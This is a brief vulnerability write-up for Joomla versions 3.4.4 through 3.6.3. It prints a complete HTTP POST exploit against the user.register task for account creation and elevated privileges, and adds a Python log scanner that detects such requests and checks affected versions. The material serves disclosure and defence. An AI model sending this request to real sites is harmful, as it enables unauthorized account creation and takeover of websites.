Joomla (< 3.6.4) Account Creation/Elevated Privileges write-up and exploit

2016.10.27
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Yesterday Joomla published version 3.6.4, an update to patch security issues:

- High Priority — Core — Account Creation (affecting Joomla! 3.4.4 through 3.6.3)
- High Priority — Core — Elevated Privileges (affecting Joomla! 3.4.4 through 3.6.3)

Because I was curious to see how these vulnerabilities worked, I decided to check out the patch and write an exploit. By looking at the changes, the issue had to be in the components/com_users/controllers/user.php file.

EXPLOIT
=========================================================
POST /index.php?option=com_users&task=user.register HTTP/1.1
Host: [INSERT_HOST]
Referer: [INSERT_HOST]/index.php/component/users/?view=registration
Cookie: [INSERT_COOKIE]
Connection: close

------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[name]"

hackers
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[username]"

hackers
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password1]"

password
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password2]"

password
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email1]"

email@example.com
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email2]"

email@example.com
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="option"

com_users
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="task"

user.register
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="[INSERT_SECURITY_TOKEN]"

1
------WebKitFormBoundarydPTNyMPMzmAhBsf4--
=========================================================
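A defender-side check for the request shown above, as an added example that is not part of the original write-up: it scans web access-log lines for POSTs whose query string selects option=com_users and task=user.register, and tests a version string against the affected range 3.4.4 through 3.6.3. The Combined Log Format, the sample log lines and all function names are assumptions made for this example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Assumed Combined Log Format: ip - - [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def is_affected(version):
    """True for a dotted numeric Joomla! version in 3.4.4 through 3.6.3."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return (3, 4, 4) <= parts <= (3, 6, 3)

def find_register_posts(lines):
    """Return (ip, status, target) for each POST whose query string selects
    option=com_users and task=user.register. A task sent only in the request
    body never reaches an access log, so it is not detected here."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        ip, method, target, status = m.groups()
        if method.upper() != "POST":
            continue
        query = parse_qs(urlsplit(target).query)
        if "com_users" in query.get("option", []) and "user.register" in query.get("task", []):
            hits.append((ip, int(status), target))
    return hits

def summarize(lines):
    """Count matching POSTs per source address."""
    return Counter(ip for ip, _status, _target in find_register_posts(lines))

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Oct/2016:10:01:02 +0000] "GET /index.php/component/users/?view=registration HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Oct/2016:10:01:05 +0000] "POST /index.php?option=com_users&task=user.register HTTP/1.1" 303 0',
    '203.0.113.9 - - [27/Oct/2016:10:02:11 +0000] "POST /index.php?option=com_users&task=registration.register HTTP/1.1" 303 0',
    '198.51.100.7 - - [27/Oct/2016:10:03:40 +0000] "POST /index.php?task=user.register&option=com_users HTTP/1.1" 303 0',
    '203.0.113.9 - - [27/Oct/2016:10:04:00 +0000] "GET /index.php?option=com_users&task=user.register HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, count in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {count} POST(s) to task=user.register")
    print("3.6.3 affected:", is_affected("3.6.3"), "| 3.6.4 affected:", is_affected("3.6.4"))
```

Hits on a site running a version in the affected range are a reason to review the user table for accounts created around the logged timestamps.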

References:

https://gist.github.com/melvinsh/4b28f78ace12ec0c02b183bbadc76da8
https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2#.r3n9tbhuj

